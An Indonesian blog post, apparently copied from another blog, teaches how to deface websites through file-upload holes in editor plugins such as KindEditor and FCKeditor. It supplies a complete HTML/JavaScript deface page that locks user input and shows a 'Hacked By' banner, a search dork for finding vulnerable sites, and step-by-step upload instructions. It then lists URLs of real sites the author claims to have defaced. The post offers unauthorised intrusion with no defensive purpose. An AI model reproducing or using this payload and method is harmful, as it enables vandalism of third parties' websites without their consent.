Lho. Kok bisa? yup, kali ini kita hanya akan melakukannya dengan celah lubang keamanan pada plugin editor, seperti FCKeditor, CKfinder, KCFinder, upload vurnibility dan kindeditor.
Shortcut : Click Here for Tutorial on Youtube
1. Dork
Ada di bawah dorknya :)
2. Buat script deface
Buka notepad seperti tadi, lalu copy pastekan script di bawah ini di dalamnya
<html>
<head><title>Defacer by _MisterNotFound_</title>
<style>
body{background:radial-gradient(circle, #1a82f7, #2F2727);}
a{color:lime;text-shadow:1px 1px 6px red;text-decoration:none;}
.ad{font-size:200px;color:#fff;font-familyL:Chiller,tahoma,arial;text-shadow:1px 1px 8px red;}
</style>
</head>
<body oncontextmenu='return false;' onkeydown='return false;' onkeyup='return false;' onmousedown='return false;' onmouseup='return false;' onmousemove='return false;' onmouseevent='return false;'>
<script>
var asd=" Hacked"
var bca=" By "
var bcc="_MisterNotFound_";
var tdc="<center class='ad'>"+asd+bca+bcc+"</center>";
window.alert("hacked by "+bcc);
document.write(tdc);
</script>
<center>SORRY Admin!! I Dont HACK YOUR SITE, BUT IM FULLY TESTED MY SKILL. From: GrooSec Squad
*MY Apologize
<br><font style="color:white;font-size:14px;">©copyright 2015 <a onmouseover='window.location=this.href' href="http://blank-note.blogspot.com"><blink>Don't Click</blink></a>
<!-- script tested Hack
im dont care with this script because im not understanding for this here
-->
</body>
</html>
Format simpan:
3. START TO DEFACING
DORK inurl:/examples/uploadbutton.html
TUTOR:
> PILIH SALAH SATU WEBSITE.
> LALU JIKA SUDAH, UPLOAD FILE YG UDAH DIBUAT > Klik upload > Cari file index.html anda yang telah terbuat > Open > Upload
> Klik form yang tertanda > Tandai semua (ctrl + A) > Copy/salin
> Jika berhasil, copy pastekan url website yg anda diface, ditambah url upload
INI BEBERAPA WEB YG UDAH SAYA DEFACE DENGAN TEKNIK KINDEDITOR
http://www.gtscn.com/Public/editor/attached/file/20150120/20150120210932_87510.html
http://second.pa919.com/300/kindeditor/attached/file/20150121/20150121121029_18876.html
http://second.pa919.com/300/kindeditor/attached/file/20150121/20150121120705_87945.html
http://www.gophp.net/furui/webcss/admin/kindeditor/attached/file/20150121/20150121115712_44298.html
http://www.17382.com/Public/JS/kindeditor-4.1.7/attached/file/20150121/20150121115701_82101.html
http://www.lafitteguesthouse.com/uploads/files/MisterNotFound/DEFACE%20BY%20MISTERNOTFOUND.txt
Sumber :
http://blank-note.blogspot.com/2013/04/teknik-dan-trik-hack-deface-kurang-dari.html
HEI COPAS kasih source web aslinya donk!!
BalasHapusini aslinya http://blank-note.blogspot.com/2013/04/teknik-dan-trik-hack-deface-kurang-dari.html